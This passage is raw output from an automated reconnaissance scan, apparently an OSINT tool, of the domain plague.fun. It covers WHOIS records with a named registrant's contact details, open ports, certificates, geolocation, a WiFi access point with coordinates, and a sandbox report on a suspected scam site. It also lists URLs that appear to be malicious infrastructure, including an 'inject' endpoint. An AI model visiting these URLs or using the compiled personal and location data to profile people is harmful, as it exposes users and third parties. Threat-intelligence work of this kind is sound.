u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731b5c07e2a0605f5df67b41e33c3c26f3899c099bd7684b50a', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'Plague', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.plague.fun', u'plague.fun'], u'cn': u'*.plague.fun', u'valid': True, u'not_after': u'2023-01-28T18:19:30Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'c8334a1e1d54310e254140e075b554abf7eb6eee3a8330536bfb363810204efa', u'key_algo': u'ECDSA', u'not_before': u'2022-10-30T18:19:31Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'plague.fun', u'summary': u'Date: Sun, 30 Oct 2022 19:20:51 GMT\ 2022-12-18 00:31:50 Open TCP Port No Pulsedive 0 0 4 0 None 195.110.124.133:21 195.110.124.0/24 2022-12-18 00:20:59 Software Used Yes Censys 0 0 2 0 None CloudFlare CloudFlare Load Balancer 2606:4700:3033::6815:1cf0 2022-12-18 00:21:34 Open TCP Port No Censys 0 0 2 0 None 104.21.19.243:2087 104.21.19.243 2022-12-18 00:11:11 Similar Domain - Whois No Whois 0 0 2 0 None Domain Name: plague.in Registry Domain ID: D1204034-IN Registrar WHOIS Server: Registrar URL: https://www.namesilo.com Updated Date: 2022-05-19T13:08:01Z Creation Date: 2005-03-16T21:19:11Z Registry Expiry Date: 2023-03-16T21:19:11Z Registrar: NameSilo, LLC Registrar IANA ID: 1479 Registrar Abuse Contact Email: Registrar Abuse Contact Phone: Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: See PrivacyGuardian.org Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: AZ Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: US Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please contact the Registrar listed above Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please contact the Registrar listed above Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please contact the Registrar listed above Name Server: ns2.dnsowl.com Name Server: ns1.dnsowl.com Name Server: ns3.dnsowl.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:11:11Z <<< For more information on Whois status codes, please visit https://icann.org/epp Access to .IN WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the .IN registry database. The data in this record is provided by .IN Registry for informational purposes only ,and .IN does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator or a Registrar, or NIXI except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. .IN reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. plague.in 2022-12-18 00:10:03 Linked URL - Internal No URLScan.io 1 0 1 0 None http://wasp.plague.fun/inject/Fu643XzaSbmCcnGN/ plague.fun 2022-12-18 00:16:27 SSL Certificate - Issued to No SSL Certificate Analyzer 1 0 2 0 None C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com 188.114.96.9 2022-12-18 00:21:54 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77af968c6fa22d82-ORD Content-Encoding: gzip 104.21.7.179 2022-12-18 00:20:46 Raw Data from RIRs No Censys 0 0 1 0 None {"last_updated_at": "2022-11-23T01:34:36.916Z", "ip": "40.113.112.131", "location_updated_at": "2022-12-18T00:20:43.061599Z", "autonomous_system_updated_at": "2022-12-18T00:20:43.061599Z", "location": {"province": "North Holland", "city": "Amsterdam", "country": "Netherlands", "coordinates": {"latitude": 52.3759, "longitude": 4.8975}, "registered_country": "United States", "registered_country_code": "US", "postal_code": "1012", "country_code": "NL", "timezone": "Europe/Amsterdam", "continent": "Europe"}, "services": [], "autonomous_system": {"bgp_prefix": "40.112.0.0/13", "country_code": "US", "asn": 8075, "name": "MICROSOFT-CORP-MSN-AS-BLOCK", "description": "MICROSOFT-CORP-MSN-AS-BLOCK"}} 40.113.112.131 2022-12-18 00:23:07 Raw Data from RIRs No CRXcavator 0 0 1 0 None [{"platform": "Chrome", "extension_id": "bifklmkjcgfnoholohpcenkjpdmkjmgj", "name": "Plague Inc Virus Wallpaper New Tab Theme", "icon": "https://lh3.googleusercontent.com/t3AZD_bhGqf5h9npZwhB5JHvvanvwSU_k_2X80WVbSgN-dYpJCtbCjiCqEjiMZry-TKfVf0r1kHQgYys0bVyTPmxRO4=w128-h128-e365-rj-sc0x00ffffff"}, {"platform": "Chrome", "extension_id": "mlbijjeimhmdbdomoalcpnelmlfjjclj", "name": "Plague Doctor Wallpapers Theme New Tab", "icon": "https://lh3.googleusercontent.com/fb9ksVgdrKheGI0g0ZJ_Ctv7XdzxU7pfaH7prTqDiWlDM8QzilpvKB2zd-0BuCggR_OSXAHDzw=w128-h128-e365-rj-sc0x00ffffff"}, {"platform": "Chrome", "extension_id": "dnejacfgfaldfjameaaaledklokkacbc", "name": "Plague Inc", "icon": "https://lh3.googleusercontent.com/0_Mq-WxO413qMWau9uPHeHGIf8oFRv6Pr-BYRbRI6hUWCZAeR2EyFBZsrsNatcARd1rEtJMgKqM=w128-h128-e365"}, {"platform": "Chrome", "extension_id": "efiefgpfndecmbeappadjclmkiahmejg", "name": "HD Plague Inc Background", "icon": "https://lh3.googleusercontent.com/jM_wv6uRdamHMwfhvrfTJgKgMZDQKUBO-1QOdDKlYThvswcAV6sJVvxOuw0XbHc_777XcVo81w=w128-h128-e365"}, {"platform": "Chrome", "extension_id": "lgglnjfaglblnglkdmmdhmjcpplmjdfj", "name": "Plague Inc HD Wallpapers New Tab Theme", "icon": "https://lh3.googleusercontent.com/LkIiFecj0j57Vv8kQivIobtgsj7K22WUUE1FdqwQCnmDz2Nuj-45Vqyt44TeCd-CofWCIjcoSrjkv_7GX2-JA8xqVw=w128-h128-e365-rj-sc0x00ffffff"}] plague.fun 2022-12-18 00:03:17 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-105.w90-116.abo.wanadoo.fr 90.116.166.105 2022-12-18 00:21:02 Open TCP Port No Censys 0 0 2 0 None 104.21.28.240:8880 104.21.28.240 2022-12-18 00:16:37 Raw Data from RIRs No numverify 0 0 3 0 None {u'international_format': u'+33892556677', u'local_format': u'0892556677', u'number': u'33892556677', u'valid': True, u'line_type': u'premium_rate', u'location': u'', u'country_code': u'FR', u'carrier': u'', u'country_name': u'France', u'country_prefix': u'+33'} +33892556677 2022-12-18 00:27:44 Affiliate - Email Address No E-Mail Address Extractor 0 0 7 0 None domini@dominiando.it Domain Name: dominiando.us Registry Domain ID: D19621490-US Registrar WHOIS Server: Registrar URL: https://key-systems.net Updated Date: 2022-06-06T00:00:06Z Creation Date: 2009-04-22T11:21:03Z Registry Expiry Date: 2023-04-21T23:59:59Z Registrar: Key-Systems GmbH Registrar IANA ID: 269 Registrar Abuse Contact Email: abuse@key-systems.net Registrar Abuse Contact Phone: +49.6894939685 Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: C19621489-US Registrant Name: Francesco Pacaccio Registrant Organization: Dominiando Srl Registrant Street: Piazzale Clodio 8 Registrant Street: Registrant Street: Registrant City: Roma Registrant State/Province: Registrant Postal Code: 00195 Registrant Country: IT Registrant Phone: +39.068072248 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: domini@dominiando.it Registrant Application Purpose: P1 Registrant Nexus Category: C31/IT Registry Admin ID: C19621489-US Admin Name: Francesco Pacaccio Admin Organization: Dominiando Srl Admin Street: Piazzale Clodio 8 Admin Street: Admin Street: Admin City: Roma Admin State/Province: Admin Postal Code: 00195 Admin Country: IT Admin Phone: +39.068072248 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: domini@dominiando.it Admin Application Purpose: P1 Admin Nexus Category: C31/IT Registry Tech ID: C2262438-US Tech Name: Domain Management Tech Organization: Dominiando Srl Tech Street: Piazzale Clodio 8 Tech Street: Tech Street: Tech City: Rome Tech State/Province: IT Tech Postal Code: 00195 Tech Country: IT Tech Phone: +39.0680693248 Tech Phone Ext: Tech Fax: +39.06233200178 Tech Fax Ext: Tech Email: domini@dominiando.it Tech Application Purpose: P1 Tech Nexus Category: C31/IT Name Server: ns.dominiando.it Name Server: ns.dominiando.asia Name Server: ns.dominiando.uk Name Server: ns.dominiando.us DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:26:49Z <<< For more information on Whois status codes, please visit https://icann.org/epp .US WHOIS Complaint Tool - http://www.whoiscomplaints.us Advanced WHOIS Instructions - http://whois.us/help.html Registry Services, LLC, the Registry Administrator for .US, has collected this information for the WHOIS database through a .US-Accredited Registrar. This information is provided to you for informational purposes only and is designed to assist persons in determining contents of a domain name registration record in the registry database. Registry Services, LLC makes this information available to you "as is" and does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data: (1) to allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone; (2) in contravention of any applicable data and privacy protection laws; or (3) to enable high volume, automated, electronic processes that apply to the registry (or its systems). Compilation, repackaging, dissemination, or other use of the WHOIS database in its entirety, or of a substantial portion thereof, is not allowed without our prior written permission. We reserve the right to modify or change these conditions at any time without prior or subsequent notification of any kind. By executing this query, in any manner whatsoever, you agree to abide by these terms. NOTE: FAILURE TO LOCATE A RECORD IN THE WHOIS DATABASE IS NOT INDICATIVE OF THE AVAILABILITY OF A DOMAIN NAME. All domain names are subject to certain additional domain name registration rules. For details, please visit our site at www.whois.us. 2022-12-18 00:12:11 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'NH', u'country_tld': u'.nl', u'ip': u'188.114.97.0', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 17231017, u'country_code': u'NL', u'timezone': u'Europe/Amsterdam', u'city': u'Amsterdam', u'network': u'188.114.96.0/22', u'languages': u'nl-NL,fy-NL', u'version': u'IPv4', u'latitude': 52.3759, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Netherlands', u'country_capital': u'Amsterdam', u'org': u'CLOUDFLARENET', u'postal': u'1012', u'asn': u'AS13335', u'country': u'NL', u'region': u'North Holland', u'longitude': 4.8975, u'country_calling_code': u'+31', u'country_area': 41526.0, u'country_code_iso3': u'NLD'} 188.114.97.0 2022-12-18 00:18:46 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.20:8080 188.114.97.0/24 2022-12-18 00:03:09 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.230 81.88.52.232 2022-12-18 00:02:50 IP Address No Mnemonic PassiveDNS 38 0 1 0 None 20.226.83.185 misogyny.wtf 2022-12-18 00:18:06 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.1:443 188.114.97.0/24 2022-12-18 00:06:00 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://tesla-grant.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:80"\n "23.56.194.53:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"tesla-grant.repl.co"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3176"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c68_IE_EarlyTabStart_0xd40_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c68_ConnHashTable<3176>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c68_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c68_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "IsoScope_c68_ConnHashTable<3176>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_c68_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"tesla-grant.repl.co"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "W6HMYWJM.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W6HMYWJM.txt]- [targetUID: 00000000-00003176]\n Dropped file: "JVWC9S6C.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\JVWC9S6C.txt]- [targetUID: 00000000-00003176]\n Dropped file: "32VWQ30V.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\32VWQ30V.txt]- [targetUID: 00000000-00003176]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "RecoveryStore._64234E21-66E6-11ED-9E63-080027C0F1EA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "W6HMYWJM.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W6HMYWJM.txt]- [targetUID: 00000000-00003176]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "~DFAA44616120A668AB.TMP" has type "data"- Location: [%TEMP%\\~DFAA44616120A668AB.TMP]- [targetUID: 00000000-00003176]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "_64234E23-66E6-11ED-9E63-080027C0F1EA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "JVWC9S6C.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\JVWC9S6C.txt]- [targetUID: 00000000-00003176]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003176]\n "~DF5A2716495486B8C9.TMP" has type "data"- Location: [%TEMP%\\~DF5A2716495486B8C9.TMP]- [targetUID: 00000000-00003176]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "_6CA1AEC0-66E6-11ED-9E63-080027C0F1EA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF43F0B10FA1F36F30.TMP" has type "data"- Location: [%TEMP%\\~DF43F0B10FA1F36F30.TMP]- [targetUID: 00000000-00003176]\n "~DF4AEC301D94927909.TMP" has type "data"- Location: [%TEMP%\\~DF4AEC301D94927909.TMP]- [targetUID: 00000000-00003176]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "32VWQ30V.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\32VWQ30V.txt]- [targetUID: 00000000-00003176]\n "urlref_httptesla-grant.repl.co" has type "HTML document ASCII text"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://tesla-grant.repl.co/"\n Pattern match: "http://tesla-grant.repl.co"\n Heuristic match: "tesla-grant.repl.co"\n Pattern match: "https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"HTTP/1.1 302 Moved Temporarily\nContent-Length: 0\nServer: Kestrel\nLocation: https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us\nRequest-Context: appId=cid-v1:9b037ab9-fa5a-4c09-81bd-41ffa859f01e\nX-Response-Cache-Status: True\nExpires: Fri, 18 Nov 2022 03:13:15 GMT\nCache-Control: max-age=0, no-cache, no-store\nPragma: no-cache\nDate: Fri, 18 Nov 2022 03:13:15 GMT\nConnection: keep-alive\nStrict-Transport-Security: max-age=31536000 ; includeSubDomains"'}], u'threat_level': 0, u'size': None, u'job_id': u'6376f77a7dd250226e34d21b', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [u'34.149.204.188', u'23.56.194.53'], u'sha256': u'1a8504381e6e071e92540e8d7b63b9f627b793b3ae398a9f28e9ee593abbc825', u'sha512': u'f78ba30555fed865fc981e1915108f6db2b2a1fefcebf6914ca79fea88f9e439914e3746ed62865d8caf620c50dd0754744276c1278fddc85b444c1ff8adb5a6', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://tesla-grant.repl.co/', u'submission_id': u'6376f77a7dd250226e34d21c', u'created_at': u'2022-11-18T03:09:46+00:00', u'filename': None}], u'analysis_start_time': u'2022-11-18T03:09:46+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 2, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 9, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'0a86fbdbb9cb5c7127346e1f375eb683', u'network_mode': u'default', u'processes': [], u'sha1': u'577fe61ac4fa64d1751fda54626c18128b308c59', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 32 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [u'tesla-grant.repl.co'], u'extracted_files': [], u'type_short': []}] 34.149.204.188 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNet4862 (Net ID: 00:01:36:5B:48:60) 37.7803446,-122.3906132 2022-12-18 00:04:28 Email Gateway (DNS MX Records) No DNS Raw Records 0 0 1 0 None eforward1.registrar-servers.com misogyny.wtf 2022-12-18 00:18:08 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.2:8080 188.114.97.0/24 2022-12-18 00:09:00 Open TCP Port No LeakIX 0 0 2 0 None 188.114.96.1:80 188.114.96.1 2022-12-18 00:09:16 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.3:8080 188.114.96.0/24 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None 43215.345121.repl.co 34.149.204.188 2022-12-18 00:19:06 Physical Location No ipapi.co 0 0 3 0 None Bergamo, Lombardy, 25, Italy, IT 81.88.58.196 2022-12-18 00:03:26 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None 189.204.149.34.bc.googleusercontent.com 34.149.204.189 2022-12-18 00:16:53 Affiliate - Company Name No Company Name Extractor 0 0 4 0 None Cloudflare, Inc. Domain Name: CLOUDFLARE.COM Registry Domain ID: 1542998887_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.cloudflare.com Registrar URL: http://www.cloudflare.com Updated Date: 2017-05-24T17:44:01Z Creation Date: 2009-02-17T22:07:54Z Registry Expiry Date: 2024-02-17T22:07:54Z Registrar: CloudFlare, Inc. Registrar IANA ID: 1910 Registrar Abuse Contact Email: Registrar Abuse Contact Phone: Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited Name Server: NS3.CLOUDFLARE.COM Name Server: NS4.CLOUDFLARE.COM Name Server: NS5.CLOUDFLARE.COM Name Server: NS6.CLOUDFLARE.COM Name Server: NS7.CLOUDFLARE.COM DNSSEC: signedDelegation DNSSEC DS Data: 2371 13 2 32996839A6D808AFE3EB4A795A0E6A7A39A76FC52FF228B22B76F6D63826F2B9 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:10:57Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: CLOUDFLARE.COM Registry Domain ID: 1542998887_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.cloudflare.com Registrar URL: https://www.cloudflare.com Updated Date: 2021-09-27T15:18:45Z Creation Date: 2009-02-17T22:07:54Z Registrar Registration Expiration Date: 2024-02-17T22:07:54Z Registrar: Cloudflare, Inc. Registrar IANA ID: 1910 Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited Registry Registrant ID: Registrant Name: DATA REDACTED Registrant Organization: DATA REDACTED Registrant Street: DATA REDACTED Registrant City: DATA REDACTED Registrant State/Province: CA Registrant Postal Code: DATA REDACTED Registrant Country: US Registrant Phone: DATA REDACTED Registrant Phone Ext: DATA REDACTED Registrant Fax: DATA REDACTED Registrant Fax Ext: DATA REDACTED Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com Registry Admin ID: Admin Name: DATA REDACTED Admin Organization: DATA REDACTED Admin Street: DATA REDACTED Admin City: DATA REDACTED Admin State/Province: DATA REDACTED Admin Postal Code: DATA REDACTED Admin Country: DATA REDACTED Admin Phone: DATA REDACTED Admin Phone Ext: DATA REDACTED Admin Fax: DATA REDACTED Admin Fax Ext: DATA REDACTED Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com Registry Tech ID: Tech Name: DATA REDACTED Tech Organization: DATA REDACTED Tech Street: DATA REDACTED Tech City: DATA REDACTED Tech State/Province: DATA REDACTED Tech Postal Code: DATA REDACTED Tech Country: DATA REDACTED Tech Phone: DATA REDACTED Tech Phone Ext: DATA REDACTED Tech Fax: DATA REDACTED Tech Fax Ext: DATA REDACTED Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com Registry Billing ID: Billing Name: DATA REDACTED Billing Organization: DATA REDACTED Billing Street: DATA REDACTED Billing City: DATA REDACTED Billing State/Province: DATA REDACTED Billing Postal Code: DATA REDACTED Billing Country: DATA REDACTED Billing Phone: DATA REDACTED Billing Phone Ext: DATA REDACTED Billing Fax: DATA REDACTED Billing Fax Ext: DATA REDACTED Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com Name Server: ns3.cloudflare.com Name Server: ns4.cloudflare.com Name Server: ns5.cloudflare.com Name Server: ns6.cloudflare.com Name Server: ns7.cloudflare.com DNSSEC: signedDelegation Registrar Abuse Contact Email: registrar-abuse@cloudflare.com Registrar 